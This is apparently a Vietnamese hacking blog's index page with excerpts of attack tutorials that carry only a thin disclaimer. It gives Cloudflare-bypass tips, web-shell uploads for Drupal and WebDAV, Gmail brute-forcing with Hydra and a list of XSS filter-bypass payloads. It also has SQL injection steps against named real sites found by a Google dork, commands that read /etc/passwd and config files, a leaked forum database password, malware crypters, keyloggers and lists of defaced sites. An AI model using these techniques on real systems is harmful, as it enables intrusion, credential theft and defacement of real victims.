DEMO@2025
Blog được tạo ra nhằm mục đích demo các kỹ thuật hack website dưới dạng Tut- và 1 số vấn đề liên quan đến Hacking Tạo một sân chơi lành mạnh và không gian học tập & trao đổi dành cho các bạn có niềm đam mê Hacking và Security. Tác giả không khuyến cáo bạn đọc sử dụng những kỹ thuật này để thâm nhập bất hợp pháp vào các hệ thông, đánh sập các website Việt cũng như không chịu bất kỳ trách nhiệm gì trước mọi hành vi mang tính chất phá hoại của độc giả!
Thứ Hai, 11 tháng 8, 2025
Thứ Ba, 26 tháng 8, 2014
Check DDOS Website
Bài viết chỉ mang tính chất kiểm tra hệ thống firewall chống ddos và tình hình cơ sở hạ tầng mạng của các website Việt Nam hiện nay, Không mang bất kỳ tính chất tấn công hay phá hoại nào vào đối tượng liệt kê ở dưới.
Những website demo dưới đây là nhưng site lớn có hệ thống hạ tầng chống ddos thuộc TOP ở VN hiện nay, tuy nhiên vẫn chưa đủ mạnh và đủ tốt để có thể chống đỡ vấn nạn ddos hiện nay.
Thứ Bảy, 5 tháng 4, 2014
Cài đặt Direct admin, Kloxo, Cpanel lên máy chủ Linux
1. Cài đặt Direct admin
- Đăng nhập ssh với quyền root
- Update yum để cập nhật các package mới nhất
# yum -y update- Cài đặt các package hỗ trợ cài đặt DA
# yum -y install nano gcc gcc-c++ mailx quota fiex wget make perl- Cài đặt Directadmin
# wget http://www.directadmin.com/setup.sh
# chmod 755 setup.sh
# ./setup.sh
Sau đó quá trình cài đặt sẽ được chạy, nếu có các câu hỏi lựa chọn yes hoặc no thì cứ ấn “y” để đồng ý tiếp tục cài đặt
Trong quá trình cài đặt sẽ yêu cầu các thông số: Client ID, Licence ID, Hostname (FQDN) của máy chủ. Nếu bạn đã đăng ký bản quyền Directadmin, MANGSIEUTOC sẽ cung cấp cho bạn đủ các thông số trên để bạn có thể nhập vào trong quá trình cài đặt này.
Thứ Ba, 25 tháng 3, 2014
Các Phương Pháp Bypass Cloudflare Toàn Tập
Qua đây, MANGSIEUTOC xin giới thiệu giải pháp tốt nhất cho các doanh nghiệp, tổ chức bị DDOS hiện nay là sử dụng dịch vụ Hosting, VPS chống DDOS Hosting chống DDOS & VPS chống DDOS
Cách 1: Sử dụng
phương pháp PING Sub Domain
Hoặc có thể sử dụng 1 số công cụ online để check như:
- Ping direct-connect.mangsieutoc.com.vn
- Ping direct.mangsieutoc.com.vn
- Ping fpt.mangsieutoc.com.vn
- Ping cpanel.mangsieutoc.com.vn
- Ping mail.mangsieutoc.com.vn
- Ping webmail.mangsieutoc.com.vn
......
Cách 2: Sử dụng
Netcraft toolbar
Thứ Hai, 10 tháng 3, 2014
Cấu hình chống Local attack
- Bật chức năng safe_mode: vi /usr/local/lib/php.ini
Tìm dòng safe_mode sau đó đổi off thành on. Sau khi đã đổi safe_mode từ off sang on thì chức năng run command ( chức năng thực thi các câu lệnh ) ở trên shell cũng không hoạt động nữa.
Thứ Bảy, 2 tháng 11, 2013
Kỹ Thuật Upshell Đối Với Drupal
Bước 1: Thiết lập mặc
định PHP code
Login với tài khoản admin và vào theo mục sau: Admin -> Administer -> Site
configuration
Tích vào PHP code
-> Set default format
Bước 2: Chèn Shell
vào nôi dung văn bản
Vào theo mục sau: Admin -> Create content . Sau có chọn 1
mục bất kỳ và chèn nội dung code shell vào phần nội dung văn bản “Body”. Sau đó lưu lại.
[TUT] Crack Password Gmail Bang Backtrack 5
Bước
1: Mở chương trình Bruite force Hydra-gtk trong Backtrack
Backtrack -> privilege Escalation -> Password Attacks -> Online Attacks -> Hydra-gtk.
Bước 2: Cấu Hình cho Email
Single target: smtp.gmail.com
Port: 465
Protocol: smtp
Chọn: Use SSL, show attempts and be verbose
Thứ Năm, 14 tháng 3, 2013
Ebooks Hacking Chọn Lọc
Trong quá trình tìm hiểu Hacking, sau đây là những ebook hay, được soleil đánh giá cao và muốn chia sẻ.
1 – Tài liệu hướng dẫn sử dụng BackTrack 5 – Version tiếng
viêtk
Tài liệu này được viết bởi cutynhangheo - Admin HCE theo kiểu biên dịch lại từ Ebook
tiếng anh. Tuy chỉ nói lên 1 phần nhỏ của công cụ hack kinh điển backtrack
nhưng khá bổ ích đối với các bạn đang bắt đầu tìm hiểu về Backtrack.
2 – Tấn công và bảo vệ
hệ thống
Ebook này được viết bởi giảng viên TT Itrain – Chuyên gia bảo
mật hàng đầu tại VN - tocbatdat. Với tư duy loric, kiến thức thâm hậu, cách viết
rõ ràng, chi tiết. Độc giả có thể dễ dàng hiểu và nắm bắt bản chất các vấn đề xoay
quanh: Nguyên tắc scan port, nguyên lý truyền tin, DDos-Botnet –
Trojan-Backdoor, Gmail Hacking, Website Hacking ...
3 – Elite Collection
HVA
Ebook này được tổng hợp lại bằng phần mền – bao gồm tất các
các tài liệu của nhóm Hacker hàng đầu Việt Nam – HVA với tất cả các vấn đề cơ bản
xoay quanh, liên quan đến bản chất Hacking như: Unix, Lunix, Windown, Registry,
How to be a Hacker...
4 – Ghi Nhớ Ubuntu
Ebook ghi nhớ các
lênh trong hệ điều hành linux – Ubuntu – Cái không thể không biết khi nghiên cứu,
tìm hiểu về hacking. Ebook tổng hợp khá chi tiêt và đầy đủ các câu lệnh.
5 - The Hacker's Underground Handbook
Cuốn Ebook về hacking nước ngoài, viết về các vấn đề xoay
quanh hacking như : programming, linux, password, Network Hacking, Wireless
Hacking, Windown Hacking, Malware, WebsiteHacking. Cuốn ebook khá hay và chi tiết
– Có cách nhìn tổng thể về hacking. Giá bán trên thị trướng khoảng vài trăm
dolla.
Thứ Ba, 12 tháng 3, 2013
[Bài 3 - XSS] Kỹ thuật Bypass và phương pháp tấn công XSS
Trong bài trước Giới thiệu chung về XSS Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS
7. Kỹ Thuật Bypass
1
số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ
đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:
"><script>alert("Check By Soleil")</script>
"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </script>
'><script>alert("Check By Soleil ")</script>
'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
<ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>
'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
</script><script>alert("Check By Soleil ")</script>
</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>
"/><script>alert("Check By Soleil ")</script>
"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
'/><script>alert("Check By Soleil ")</script>
'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>
</SCRIPT>">'<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
";alert("Check By Soleil ");"
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
';alert("Check By Soleil ");'
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
";alert("Check By Soleil ")
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) ';alert("Check By Soleil ")
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
Trong đó: 67, 104, 101, 99, 107,
32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By
Soleil” ở dạng char.
Ví dụ:
-
Attacker có thể chèn vào thanh tìm kiếm
site http://www.hanoi.gov.vn đoạn
mã script đã bypass sau:
<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.
Chủ Nhật, 10 tháng 3, 2013
[TUT] Upshell Và Deface Sử Dụng Webdav
Tool:
Tool scan thấy có dính mã độc. Khuyến cáo ae nên sử dụng
trên máy ảo
Pass dải nén: vhb
Bước 1: Vào Tab webDav và chọn ASP Shell Maker
Thứ Hai, 7 tháng 1, 2013
[Bài 2 - XSS] Giới thiệu Chung về XSS và Phương pháp kiểm tra lỗi
Trong bài thứ nhất Giới Thiệu Chung Về XSS Soleil đã giới thiệu những nội dung chính sẽ viết, Ở bài thứ 2 này soleil sẽ giải thích rõ về XSS, phương pháp check site dính XSS và 1 số thao thác khi thực hiện tấn công theo phương thức XSS.
1- XSS là gì ?
XSS( Cross-Site
Scripting ) là một trong những kỹ thuật hack website phổ biến nhất hiện nay bằng
cách chèn vào url, chèn qua các thanh tìm kiếm hoặc chèn ở bất cứ 1 textbox nào
những thẻ HTML hoặc những đoạn mã script nguy hiểm, từ đó chiếm quyền điều khiển
của victim hoặc thực hiện những mệnh lệnh mà hacker đưa ra.
2- Nguyên lý hoạt động XSS
Khi website đã bị chèn các thẻ
html hay những đoạn mã script nghĩa là đã gửi các request từ máy client đến
server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server.
Khi người sử dụng click vào những link đó thì toàn bộ cookies, mật khẩu lưu
trên trình duyệt được gửi về cho hacker qua email hoặc 1 file nào đó trên host đã
được thiết lập từ trước hoặc bị dẫn tới 1 trang fishing mà hacker đã thiết lập
từ trước hay bị cài đặt các chương trình virus, Trojan, backdoor trên máy
victim tùy vào mệnh lệnh của hacker
3- Phân loại XSS
XSS Có 2 dạng, đó là:
+ Persistent + Non-Persistent type
4- Mức độ nguy hiểm XSS
+ Ăn cắp cookies, mật khẩu, cướp session làm việc
+ Cài các loại virus, trojan, backdoor trên máy tính
victim
+ Deface website. Tuy nhiên nó chỉ chạy trên
trình duyệt phía client và chỉ tấn công vào bề mặt website, không
làm thay đổi cấu trúc mã nguồn, cơ sở dữ liệu của website trên server.
Thứ Hai, 1 tháng 10, 2012
Lời xin lỗi - Chút bộc bạch
Như tiêu đề, Soleil gửi lời xin lỗi tới tất cả các bạn đọc vì đã không thực hiện lời hứa - Tiếp tục viết và public tut được nữa
Thời gian này, bước vào kỳ cuối cùng của quãng đời sinh viên - Chuyên ngành cơ khí HK, chất lượng cao - BK HN. Khối lượng đồ án và bài tập kỳ cuối cùng gần như quá tải. Vì thế chắc sẽ không còn nhiều đêm trắng cùng ae ngồi mày mò, gõ gõ như thời gian vừa qua được nữa. Soleil thực sự muốn tập trung 1 kỳ cuối cùng cho chuyên ngành và thực hiện 1 số dự định. Vì vậy thời gian này, có thể trong vòng 3,4 tháng nữa, sẽ có ít tut trên blog - Mong các bạn đọc thông cảm và không gửi mail thêm nữa.
Nhân tiện những bạn nào có niềm đam mê với hacking muốn gia nhập vào VHB http://vhbgroup.net cùng ae trong đó trao đổi học tập & trao đổi thì có thể để lại user và mail. Pass mặc định là 123456@, các bạn nhơ change pass sau khi vào 4rum. Soleil hứa sẽ reg nick cho tất cả xem như 1 hành động gỡ lỗi. Và VHB vẫn sẽ hoạt động bình thường.
Thân!
Thứ Ba, 21 tháng 8, 2012
[Bài 1 - XSS ] Giới Thiệu Chung
Soleil sẽ góp 1 chút kiên thức về XSS cho ae tham khảo trong 3 bài viết.
Bài đầu tiên sẽ mang tính chất giới thiệu. Trong quá trình viết có gì
sai sót mong được ae góp ý.
Các nội dung chính:
1- XSS là gì ?
2- Nguyên lý hoạt động XSS
3- Phân loại XSS
4- Mức độ nguy hiểm XSS
5- Phương pháp check site dính lỗ hổng XSS
6- 1 số thao tác khi tấn công bằng XSS
7- Kỹ Thuật Bypass
8- Demo 1 số site dính XSS:
9- Quá trình các bước thực hiện tấn công bằng XSS
Trong bài 2, Soleil sẽ viết từ mục 1 đến mục 5 ^^
Các nội dung chính:
1- XSS là gì ?
2- Nguyên lý hoạt động XSS
3- Phân loại XSS
4- Mức độ nguy hiểm XSS
5- Phương pháp check site dính lỗ hổng XSS
6- 1 số thao tác khi tấn công bằng XSS
7- Kỹ Thuật Bypass
8- Demo 1 số site dính XSS:
9- Quá trình các bước thực hiện tấn công bằng XSS
Trong bài 2, Soleil sẽ viết từ mục 1 đến mục 5 ^^
Thứ Năm, 16 tháng 8, 2012
Private Blog - VHB_Group
Nhân dịp VHB comback, soleil sẽ public 1 số tut khá nhạy cảm và sẽ private blog và chỉ dành cho thành viên VHB truy cập.
Ngoài ra, Nếu ai có nhu cầu để cấp quyền truy cập blog thì để lại email phía dưới.
Sẽ chính thức private sau 1 tuần từ lúc pub thông báo này. (đến 25/8). Sau ngày 25/8 sẽ ko cấp quyền cho bất cứ 1 ai nưa,
Thân!
Thứ Tư, 8 tháng 8, 2012
Check site .cn tối ngày 7/8/12
1 số site khựa bảo mật kém bị check tối 7/8
http://www.jsroc.com.tw/soleil.html
http://www.horshin.com.tw/soleil.html
http://www.worldchemical.com.tw/soleil.html
http://www.shin-yi.com.tw/soleil.html
http://www.idean.com.tw/soleil.html
http://www.horshin.com.tw/soleil.html
http://www.worldchemical.com.tw/soleil.html
http://www.shin-yi.com.tw/soleil.html
http://www.idean.com.tw/soleil.html
1 số site đã bị deface :
Topic sẽ tiếp tục cập nhật trong tối nay ^^
Chủ Nhật, 29 tháng 7, 2012
[Bài 4 – SQLI] Bypass 406 Not Acceptable
Trong các bài trước , Soleil đã giới thiệu các dạng attack
cơ bản sử dụng phương pháp SQLI để chiếm quyền quản trị administrator: Khai thác đối với Aspx, Khai thác lỗi cơ bản, Lỗi Jet. Tuy
nhiên trong lúc khai thác, 1 số site đã chặn ở 1 vài querry sqli và không thể
tiếp tục.
Hôm nay Soleil sẽ demo 1 dạng bypass “406 Not Acceptable”
thông dụng thường gặp phải lúc khai thác đồng thời cũng pubic bug sqli đối với
công ty thiết kế website “Viet Arrow”.
Google dork: Designed by Viet Arrow id=
Tất cả các website được thiết kế bởi Viet Arrow đều dính lỗi
sqli, sau đây là 1 số ví dụ
Soleil sẽ chọn 1 victim bất kỳ để khai thác.
Victim: http://www.khaithong.com.vn/
Trước khi vào bài này, có thể tham khảo qua bài 2 : Khai Thác Lỗi Cơ Bản
Bước 1: Check lỗi
Thêm dấu ‘ vào sau con số của đường link có dạng id=
http://www.khaithong.com.vn/index.php?do=content&id=1
Nếu giao diện website thay đổi nghĩa là site đã bị dính lỗi
sqli
Thứ Sáu, 27 tháng 7, 2012
Một số phần mền Mã Hóa Virus Free
1-
07-12-12 Crypter
-
Click vào file và chọn path tới file virus
-
Click vào stub và chọn path tới file stub.exe (
cùng thư mục với file 07-12-12 Crypter.exe )
-
Sau đó tùy chọn các chức năng và Encrypt
-
Trong trường hợp này Soleil sẽ lấy demo với file
virus là con bot được tạo từ tool botnet Di5
-
Hình ảnh check file virus khi chưa mã hóa:
Các phần mền keylogger không thể bỏ qua
Trong tất cả các keylogger đã sử dụng thì soleil kết nhất là hai phần mền: "Ardamax, Perfect" với cách sử dụng khá đơn giản và đầy đủ các tính năng: Ghi lại thao tác bàn phím, chụp destop, chụp webcam, link website đã vào, Create trojan, gửi mail, thiết lập thời gian gửi, đính kèm phần mền, chạy chế độ ẩn,.....
1 - Ardamax keylogger
Ardramax là phần mên keylogger đầy đủ các tính năng với cách sử dụng gần như là đơn giản nhất và được rất nhiều người ưa chuộng.
link download: ( Bao gồm cả key)
Thứ Năm, 19 tháng 7, 2012
[Tut] Up Shell Vbulletin Qua Database P.I
Khi thực hiện Local Attack đối với 4rum thì include shell qua database, là 1 kỹ năng không thể thiếu bởi vì thư mục Admincp thông thường không có mấy admin sơ ý đến nỗi quên không change path và đặt file .htaccess bảo vệ. Vì vậy phương pháp include shell database được các attacker sử dụng 1 cách phổ biến
Có 3 cách để include shell, hôm nay soleil sẽ giới thiệu cách thứ nhất.
Victim: http://raoonline.net/forum.php
Giả sử soleil đã có shell
1 site trên cùng server,
Với shell này ta có thể Local
Attack sang forum: http://raoonline.net và thu được thông tin config như sau:
$config['MasterServer']['username'] = 'raovat_forum'; $config['MasterServer']['password'] = '125254857'
Bước
1: Login vào cơ sở dữ liệu:
Thứ Hai, 16 tháng 7, 2012
[Bài 3 - Local Attack] Các Phương Pháp Local Attack
Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ bài 2 - Giới thiệu tính năng 1 số shell
* Nhắc lại trình tự các bước Local Attack
1-
View danh
sách các user trong server
2-
Tìm file
config.php
3-
Get thông tin login vào database
4-
Crack hoặc change pass admin
5-
Login vào quyên quản trị và upshell
1-
View danh sách các user trên server
Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó
-
Một số câu lệnh để get user:
Lệnh phổ biến nhất:
Cat /etc/passwd
Tuy nhiên một số server cấm lệnh cat, có thể
sử dụng các lệnh sau một cách linh hoạt
Less /etc/passwd./cat/etc/passwdMore /etc/passwd
Ngoài ra có thể sử dụng chức năng get user
trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl hoặc các
shell sau:
http://www.mediafire.com/?hi4gnmu3kpxn095
( đk: chmod 755)
Pass download: soleil_vhb
Pass dải nén: ceh.vn
-
Câu lênh get user & domain
Cat /etc/virtual/domainowners ( Chỉ dùng đối với direct admin )
2-
Tìm file path file config.php
Đối với các mã nguồn mở thì path file config được mặc định
như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối
với server linux, path là: /home/user/public_html














